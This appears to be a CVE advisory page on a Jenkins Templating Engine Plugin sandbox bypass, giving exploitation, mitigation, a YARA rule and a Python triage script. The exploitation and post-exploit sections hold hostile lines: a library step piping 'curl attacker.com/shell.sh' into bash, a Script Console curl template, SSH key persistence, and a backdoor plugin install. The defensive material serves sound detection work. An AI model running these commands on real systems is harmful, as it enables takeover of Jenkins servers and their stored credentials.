How the CVE Works
The Jenkins Templating Engine Plugin 2.5.3 and earlier does not apply the Groovy sandbox to libraries defined in folders. An attacker who holds Item/Configure permission on such a folder can supply a library containing arbitrary Groovy, and that code runs unsandboxed inside the Jenkins controller JVM. Because the controller process holds the stored credentials, the master key and a channel to every agent, this amounts to full compromise of the Jenkins installation. The root cause is an access-control gap in how folder-level library sources are loaded: code that is supposed to run only under sandbox restrictions is instead executed in the controller's privileged context.
DailyCVE Form
Platform: Jenkins
Version: Templating Engine Plugin <= 2.5.3
Vulnerability: Sandbox bypass
Severity: Critical
Date: 04/29/2025
What Undercode Says:
Exploitation:
1. Payload Injection (illustrative: a library step, supplied through a folder the attacker can configure, that spawns a shell):
library('malicious_lib') { def cmd = "curl attacker.com/shell.sh | bash".execute() }
2. Exploit via API:
curl -X POST -u attacker:password http://jenkins/scriptText --data-urlencode "script=<GROOVY_PAYLOAD>"
Note that /scriptText is the Script Console endpoint and requires Overall/Administer, so it is not the path this vulnerability opens. The bug matters precisely because a user with only Item/Configure gets the same unsandboxed execution by placing the payload in a folder-scoped library and running a pipeline that loads it.
Mitigation:
1. Patch Upgrade (the plugin id is templating-engine; jenkins-plugin-cli takes --plugins name:version, and the controller must be restarted afterwards for the new version to load):
jenkins-plugin-cli --plugins templating-engine:2.5.4
2. Sandbox Hardening:
Until the patch is applied, treat every folder-level library source as trusted code: only administrators should be able to add or edit library sources, and pipelines that use the Templating Engine should keep "Use Groovy Sandbox" enabled so that any request to approve new method signatures remains visible to administrators. @GrabConfig has no option that controls the sandbox and is not a mitigation.
3. Access Control:
Remove Item/Configure from untrusted users and groups on every folder that defines libraries. With matrix-auth this is done on the Configure Global Security page or in the folder's project-based matrix; there is no CLI switch that disables a permission by name.
Detection:
1. Configuration Review:
The abuse leaves traces in folder config.xml files (library sources added or changed) and in the library sources themselves rather than in a fixed log message. List the folders that carry Templating Engine configuration (assuming the plugin's classes sit under the org.boozallen.plugins.jte package) and compare them against a known-good baseline:
grep -rl "org.boozallen.plugins.jte" --include=config.xml "$JENKINS_HOME/jobs"
Then review the controller log (/var/log/jenkins/jenkins.log on package installs) and any audit-trail output for folder configuration changes made by non-administrators in the relevant window.
2. YARA Rule (scans Groovy library sources for process execution, which sandboxed library code should never contain):
rule jenkins_jte_library_exec
{
    strings:
        $exec = ".execute()"
        $pb = "ProcessBuilder"
        $rt = "Runtime.getRuntime()"
    condition:
        any of them
}
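The checks above can be run together as one offline triage of a copy of JENKINS_HOME. The script below is an added example, not code from the original post or from the Templating Engine project: it reads the installed plugin version from the exploded plugin's MANIFEST.MF and flags anything below 2.5.4, lists folder config.xml files that carry Templating Engine configuration (assuming the plugin's classes live under org.boozallen.plugins.jte), and scans every Groovy source for process-spawning calls. The sample JENKINS_HOME it builds, including the folder property element name and the two library steps, is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Version the page reports as fixed; anything below it is treated as vulnerable.
FIXED_VERSION = (2, 5, 4)
# Assumption: the plugin's classes live under this Java package, so its
# folder-level configuration shows up in config.xml under this prefix.
JTE_MARKER = "org.boozallen.plugins.jte"
# Groovy ways of spawning a process; sandboxed library code should never need them.
EXEC_PATTERNS = {
    "string.execute": re.compile(r"\.execute\s*\("),
    "ProcessBuilder": re.compile(r"\bProcessBuilder\b"),
    "Runtime.exec": re.compile(r"Runtime\.getRuntime\s*\(\s*\)\s*\.exec\b"),
}


def parse_version(text):
    """'2.5.3' -> (2, 5, 3); a qualifier such as '-SNAPSHOT' is ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-", 1)[0]))


def is_vulnerable_version(text):
    return parse_version(text) < FIXED_VERSION


def plugin_version(jenkins_home):
    """Plugin-Version from the exploded plugin's MANIFEST.MF, or None if not installed."""
    manifest = Path(jenkins_home, "plugins", "templating-engine", "META-INF", "MANIFEST.MF")
    if not manifest.is_file():
        return None
    for line in manifest.read_text(encoding="utf-8", errors="replace").splitlines():
        if line.startswith("Plugin-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def folders_with_jte_config(jenkins_home):
    """Relative paths of config.xml files under jobs/ that carry JTE configuration."""
    home = Path(jenkins_home)
    hits = []
    for cfg in sorted((home / "jobs").rglob("config.xml")):
        if JTE_MARKER in cfg.read_text(encoding="utf-8", errors="replace"):
            hits.append(cfg.relative_to(home).as_posix())
    return hits


def scan_library_sources(root):
    """(relative file, line number, pattern name) for each process-spawning call in *.groovy."""
    root = Path(root)
    findings = []
    for src in sorted(root.rglob("*.groovy")):
        lines = src.read_text(encoding="utf-8", errors="replace").splitlines()
        for lineno, line in enumerate(lines, start=1):
            for name, pattern in EXEC_PATTERNS.items():
                if pattern.search(line):
                    findings.append((src.relative_to(root).as_posix(), lineno, name))
    return findings


def triage(jenkins_home):
    version = plugin_version(jenkins_home)
    return {
        "plugin_version": version,
        "vulnerable_version": version is not None and is_vulnerable_version(version),
        "jte_folders": folders_with_jte_config(jenkins_home),
        "exec_findings": scan_library_sources(jenkins_home),
    }


def build_sample_home():
    """Constructed JENKINS_HOME: vulnerable plugin, one JTE folder, one benign and one hostile library."""
    home = Path(tempfile.mkdtemp(prefix="jenkins-home-"))
    manifest_dir = home / "plugins" / "templating-engine" / "META-INF"
    manifest_dir.mkdir(parents=True)
    (manifest_dir / "MANIFEST.MF").write_text(
        "Manifest-Version: 1.0\nShort-Name: templating-engine\nPlugin-Version: 2.5.3\n")
    folder = home / "jobs" / "team-a"
    folder.mkdir(parents=True)
    # The property element name is a constructed stand-in, not the plugin's real class.
    (folder / "config.xml").write_text(
        "<?xml version='1.1' encoding='UTF-8'?>\n"
        "<com.cloudbees.hudson.plugins.folder.Folder>\n  <properties>\n"
        f"    <{JTE_MARKER}.ExampleFolderProperty/>\n  </properties>\n"
        "</com.cloudbees.hudson.plugins.folder.Folder>\n")
    benign = home / "libs" / "maven" / "steps"
    benign.mkdir(parents=True)
    (benign / "build.groovy").write_text('void call() {\n    sh "mvn -B verify"\n}\n')
    hostile = home / "libs" / "evil" / "steps"
    hostile.mkdir(parents=True)
    (hostile / "deploy.groovy").write_text(
        'void call() {\n    "curl attacker.example/shell.sh | bash".execute()\n}\n')
    return home


if __name__ == "__main__":
    for key, value in triage(build_sample_home()).items():
        print(f"{key}: {value}")
```

Point triage() at a copy of the real JENKINS_HOME rather than the live directory; the Groovy scan deliberately covers checked-out library workspaces as well as anything stored under jobs/, since a library pulled from SCM lands in a workspace before it is loaded.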
Post-Exploit:
1. Lateral Movement (in practice this persists SSH access for the jenkins service account; the private key at /tmp/id_rsa is taken off the host and then reused against the controller and any agents that trust it):
ssh-keygen -f /tmp/id_rsa -N "" && cat /tmp/id_rsa.pub >> ~/.ssh/authorized_keys
2. Persistence (PluginManager.install resolves plugin names against the update center rather than a local .hpi path; either route needs Overall/Administer, which code running inside the controller JVM effectively has):
Jenkins.instance.pluginManager.install("backdoor-plugin.hpi", false)
References:
Reported By: nvd.nist.gov